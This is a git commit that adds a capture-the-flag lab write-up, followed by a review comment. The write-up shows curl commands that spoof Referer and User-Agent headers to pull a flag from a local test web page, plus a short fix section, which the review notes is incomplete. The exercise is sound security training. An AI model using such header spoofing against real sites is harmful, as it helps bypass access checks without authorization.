author: Thomas Vanbesien <tvanbesi@proton.me> 2026-03-27 11:52:59 +0100
committer: Thomas Vanbesien <tvanbesi@proton.me> 2026-03-27 11:52:59 +0100
commit: 7c6e2149b4e21c82e174f1e2b3b98357a69dfb59 (patch)
tree: 29a0c64e40e2931d3e983629adec40e2d681cdc2 /Information leakage/Resources
parent: 3b584164fba5d88866d84f1ce2bbe26e473b58b7 (diff)
Add information leakage solution
Diffstat (limited to 'Information leakage/Resources')
-rw-r--r-- Information leakage/Resources/notes.md | 12
1 files changed, 12 insertions, 0 deletions
diff --git a/Information leakage/Resources/notes.md b/Information leakage/Resources/notes.md
new file mode 100644
index 0000000..9f13add
--- /dev/null
+++ b/Information leakage/Resources/notes.md
@@ -0,0 +1,12 @@
+## Exploit
+
+1. Found a comment saying `You must come from : "https://www.nsa.gov/`
+1. Since one cannot edit the **Referer** header in Firefox, I used `curl --header "Referer: https://www.nsa.gov" "http://10.0.2.15/?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f"`
+1. Found another comment in the returned page: `Let's use this browser : "ft_bornToSec". It will help you a lot.`
+1. Added a `User-Agent` header `ft_bornToSec` and found the flag. Complete command: `curl --header "User-Agent: ft_bornToSec" --header "Referer: https://www.nsa.gov/" "http://10.0.2.15/index.php?page=b7e44c7a40c5f80139f0a50f3650fb2bd8d00b0d24667c4c2ca32c88e13b758f" | grep "The flag"`
+
+## Fix
+
+[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage]()
+
+Don't put sensitive information in HTML code.
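Review bot: The `## Fix` section only says "Don't put sensitive information in HTML code", but the steps above show the flag being returned purely because the request carried a specific `Referer` and `User-Agent`. Both headers are client-supplied and were set freely with `curl --header`, so the fix should also state that they must not be used as an access check and that the page needs a real server-side authorization decision. The OWASP link in the same section has the URL as its link text and an empty target (`[https://owasp.org/...]()`), so it renders without an href; move the URL into the parentheses. Minor: the quoted comment in step 1 has an unclosed `"`, and steps 2 and 4 differ in the trailing slash of the Referer value and in `/?page=` versus `/index.php?page=`; note whether either difference matters so the steps reproduce as written.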